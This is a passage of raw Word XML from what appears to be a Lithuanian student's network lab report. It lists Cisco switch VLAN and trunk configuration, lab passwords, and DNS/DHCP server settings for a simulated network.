      </w:r>
    </w:p>
    <w:p w14:paraId="4CF0482D" w14:textId="6CAEA092" w:rsidR="45E38913" w:rsidRPr="005A5C28" w:rsidRDefault="5D438E47" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport mode access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06475164" w14:textId="7225C1D2" w:rsidR="45E38913" w:rsidRPr="005A5C28" w:rsidRDefault="5D438E47" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface GigabitEthernet0/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74171B1A" w14:textId="657BCDFF" w:rsidR="45E38913" w:rsidRPr="005A5C28" w:rsidRDefault="5D438E47" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport trunk allowed vlan 2-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005B6468" w14:textId="2088D83E" w:rsidR="45E38913" w:rsidRPr="005A5C28" w:rsidRDefault="5D438E47" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport mode trunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A0DA9C" w14:textId="2088D83E" w:rsidR="19D5CEBB" w:rsidRPr="005A5C28" w:rsidRDefault="19D5CEBB" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37CE9B66" w14:textId="3DD8772E" w:rsidR="45E38913" w:rsidRPr="005A5C28" w:rsidRDefault="5D438E47" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Komutatorius2. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD535FF" w14:textId="35F41215" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E680927" w14:textId="3DD8772E" w:rsidR="19D5CEBB" w:rsidRPr="005A5C28" w:rsidRDefault="68CB7FD9" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface FastEthernet0/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3437234A" w14:textId="3DD8772E" w:rsidR="19D5CEBB" w:rsidRPr="005A5C28" w:rsidRDefault="68CB7FD9" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport access vlan 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71252A1F" w14:textId="3DD8772E" w:rsidR="19D5CEBB" w:rsidRPr="005A5C28" w:rsidRDefault="68CB7FD9" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport mode access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4A8545" w14:textId="3DD8772E" w:rsidR="19D5CEBB" w:rsidRPr="005A5C28" w:rsidRDefault="68CB7FD9" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface FastEthernet0/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2518CC61" w14:textId="3DD8772E" w:rsidR="19D5CEBB" w:rsidRPr="005A5C28" w:rsidRDefault="68CB7FD9" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport access vlan 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF0A6B9" w14:textId="3DD8772E" w:rsidR="19D5CEBB" w:rsidRPr="005A5C28" w:rsidRDefault="68CB7FD9" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport mode access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0352A348" w14:textId="3DD8772E" w:rsidR="19D5CEBB" w:rsidRPr="005A5C28" w:rsidRDefault="68CB7FD9" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface FastEthernet0/3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F0D276" w14:textId="3DD8772E" w:rsidR="19D5CEBB" w:rsidRPr="005A5C28" w:rsidRDefault="68CB7FD9" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport access vlan 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277C76B8" w14:textId="3DD8772E" w:rsidR="19D5CEBB" w:rsidRPr="005A5C28" w:rsidRDefault="68CB7FD9" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport mode access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBEDDEF" w14:textId="3DD8772E" w:rsidR="19D5CEBB" w:rsidRPr="005A5C28" w:rsidRDefault="19D5CEBB" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="578A57D0" w14:textId="3D450833" w:rsidR="5825770A" w:rsidRPr="005A5C28" w:rsidRDefault="68CB7FD9" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Komutatorius3. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAD7EBA" w14:textId="66F0EFC2" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="236F7672" w14:textId="69F5A7A1" w:rsidR="0688CD61" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface FastEthernet0/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A3738F" w14:textId="0C3099C8" w:rsidR="0688CD61" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport access vlan 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CE989A" w14:textId="668625CE" w:rsidR="0688CD61" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport mode access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D763F88" w14:textId="25E02E82" w:rsidR="0688CD61" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface FastEthernet0/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523F173E" w14:textId="7124E21F" w:rsidR="0688CD61" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport access vlan 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD9205C" w14:textId="3898D316" w:rsidR="0688CD61" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport mode access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6A6525" w14:textId="3898D316" w:rsidR="246FDC7C" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>interface GigabitEthernet0/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146E11AB" w14:textId="3898D316" w:rsidR="246FDC7C" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport trunk allowed vlan 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CF1839" w14:textId="3898D316" w:rsidR="246FDC7C" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport mode trunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2F1E7D" w14:textId="1C964DFD" w:rsidR="1881AC3D" w:rsidRPr="005A5C28" w:rsidRDefault="1881AC3D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="748B8263" w14:textId="14E5E82D" w:rsidR="43E11C79" w:rsidRPr="005A5C28" w:rsidRDefault="66D90225" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Komutatorius4. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch3</w:t>
      </w:r>
      <w:r w:rsidR="013FF7A6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E12C11" w14:textId="05A97896" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0808B1A4" w14:textId="0CFBC90F" w:rsidR="1881AC3D" w:rsidRPr="005A5C28" w:rsidRDefault="66D90225" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>enable password cisco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2B8F19" w14:textId="0CFBC90F" w:rsidR="43E11C79" w:rsidRPr="005A5C28" w:rsidRDefault="66D90225" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>username admin privilege 1 password 0 cisco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEB076E" w14:textId="14C6146E" w:rsidR="43E11C79" w:rsidRPr="005A5C28" w:rsidRDefault="66D90225" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface Vlan1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B26151" w14:textId="26C3B123" w:rsidR="43E11C79" w:rsidRPr="005A5C28" w:rsidRDefault="66D90225" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip address 192.168.6.254 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615DF274" w14:textId="3898D316" w:rsidR="4167086C" w:rsidRPr="005A5C28" w:rsidRDefault="4167086C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E34EEB0" w14:textId="0202DE47" w:rsidR="0688CD61" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Serveris2. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Server-PT dns, dhcp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DED495E" w14:textId="6AE2FCC5" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4330B8B3" w14:textId="7EC9444B" w:rsidR="7B4FD4C3" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DG- 192.168.4.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D23341" w14:textId="4D85BC4E" w:rsidR="45E38913" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Subnet Mask - 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557CE9F0" w14:textId="0BC7AE47" w:rsidR="0688CD61" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DG - 192.168.4.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DADC6C3" w14:textId="4BAE3895" w:rsidR="0688CD61" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP - On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E1183E" w14:textId="45D97EAB" w:rsidR="0688CD61" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DNS - On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AC5733" w14:textId="10BA5BCF" w:rsidR="0688CD61" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Name - testas.lt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB93048" w14:textId="0BF3DA0E" w:rsidR="0688CD61" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Address- 210.210.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D9C5EB" w14:textId="77777777" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DHCP- on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F281FDC" w14:textId="5A8134F7" w:rsidR="63F038DD" w:rsidRPr="005A5C28" w:rsidRDefault="260DB299" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pool Name- serverPool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BEDF64" w14:textId="3D642427" w:rsidR="0688CD61" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Start IP Address 192.168.4.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E1285A" w14:textId="3C67466F" w:rsidR="0688CD61" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Subnet Mask – 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283256A4" w14:textId="60135FC9" w:rsidR="47FD03AE" w:rsidRPr="005A5C28" w:rsidRDefault="0991CD82" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pool Name – Adm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3871914B" w14:textId="36666F31" w:rsidR="1E7FE668" w:rsidRPr="005A5C28" w:rsidRDefault="0991CD82" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DG – 192.168.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C1E3A2" w14:textId="36DDB435" w:rsidR="1E7FE668" w:rsidRPr="005A5C28" w:rsidRDefault="0991CD82" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
